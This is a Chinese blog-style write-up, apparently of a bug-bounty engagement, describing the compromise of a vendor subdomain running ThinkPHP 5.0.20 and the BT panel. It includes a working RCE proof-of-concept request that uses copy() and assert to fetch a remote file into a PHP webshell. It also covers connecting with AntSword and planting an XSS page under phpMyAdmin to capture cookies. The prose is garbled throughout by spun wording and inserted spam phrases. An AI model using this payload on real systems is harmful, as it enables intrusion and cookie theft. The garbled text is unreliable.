首页 微博热点正文

猪猪侠之幸福救援队,黑客之实践一次《网络域名绑架》,鬼节

在挖某厂商的SRC时,我用了农民安全的farmscan_domain对他进行了子域名发掘,

发现了一个子域名为xxxxxx.x.com

拜访他鲍长义发现了

然后我黄昌川意俞飞鸿固定伴侣是谁识到了这儿有搞头猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节

信鄂b息搜集

反解析ip 发现他是腾讯云下的服务器

用nmap扫描端口 发现他开放了22 80 8淫秽扮演88 8888端口

然后直接拜访ip时 回来了一个json数据

{"code":0,"msg":"欢迎拜访","data":[]}

有个扫出一个后台ip/Admin/l教师胸ogin/index.html 这儿的验证码不会改写可进行爆炸 通过一番测验爆炸不出暗码

拜访888端口 回响403

拜访8888端口

我只能得到这些信息

这个腾讯云的服务器 用了浮屠面板 浮屠的后台地址我无法得知 有个可爆炸的后台

在爆炸了后台跟ssh无果五福鼠之孙子兵法之后我简直jiumodiary抛弃

然后我决议再对其进行一次目录爆炸

RCE

然后我忽然想拜访一下这个目录看看他会报什么错xxxx/%3f/

所以最大的起色来了,报错了,最重要的是发现了这个

ThinkPHP V5.0.20 { 十年磨一剑-为API开发规划的高性能结构 }

下意识就想到了thinkphp的缝隙,

尽管看过了水泡泡师傅和chybe猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节ta师傅在先知上关于这个缝隙的文章,

可是由于各种原因没有好好复现过这个缝隙在后面插payload的过程中踩了许多坑,

进内衣工作过屡次测验,总算成功的getshell了

poc

http://xxxx/inde预组词x.php?s=captcha&lego=copy("http://xxx/lego.txt","test.php")
_method=吴京安遇事故重伤__construct&filter=assert&method=get&server[REQUEST_METHOD]=lego

蚁剑连上去

发现了一个hydra.php的文件,发现被人种过马了,

顺手把这个马删了。

在拿下这个域名的webshell之后,我想对这种缝隙进行一个使用

在这子域名下

带着了一些 *.xxx.com的cookie

所以我便想着上传一个xss页面

使用

直接用域名拜访xxxxx/test.php 回来404

ip/test.php 会拜访到我的一句话

只要在拜访域名的时分浏览器才会带着cookie,用ip拜访时浏览器不会带着cookie

意味着,我即便上传了带XSS的html页面,也无法拜访到XSS页面猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节。

可是我用域名:8888拜访能够拜访到浮屠那个页面吴英杰简历

我起先想要修正那个页面来秦怡谈金焰秦文的联系完结XSS

假如猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节咱们想要修正浮屠的话,就要拜访/www/server/panel/ 目录,

可是我的webshell是没有权限拜访那个目录了,除非提权,

可是这又是一台腾讯云的服务器,应该不会呈现能够提权的缝隙,

所以我陷入了深思。。。。。

然后深思久了我何易于挽舟就去WC了,在WC的过程中,我用手机看了一下浮屠官网的用户手册 长生牧云录http://docs.bt.cn/424204

在翻阅之后,我发现了一些风趣的东西,比方咱们之前直接用凤为后域名拜访,发现有那个没找到站点的页面,

其实这个是由于浮屠面板里边没有设置这个域名为解析的域名,所以会呈现这种状况。

然后咱们需求/etc/init.d/bt default才干检查浮屠的后台地址,我用蚁剑发现无法执行命令,估量是权限不行,

所以修正8888端口下的浮屠估量也是凉凉了

在持续翻阅浮屠的用户手册后,我发现了端口888运行了是phpmyadmin,然后我忽然感觉到了我应该是能够完结这次使用了,

我找到了phpmyadmin的绝对路径

phpmyadmin_xxxxxx猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节xx张文朝x

咱们之前直接拜访888端口返奶头相片回的是

当我拜访

xxx.com/phpmyadmin_xxxxxxxxx/

成功的跳转到了phpmyadmin的后台

在这个目录下新建一猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节个html页面,拜访

子域名:888/p猪猪侠之美好救援队,黑客之实践一次《网络域名劫持》,鬼节hpmyadmin_xxxxxxxxx/test.html

成功弹出cook鎏英奇鸢ie

至此,我的使用现已完结了。

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。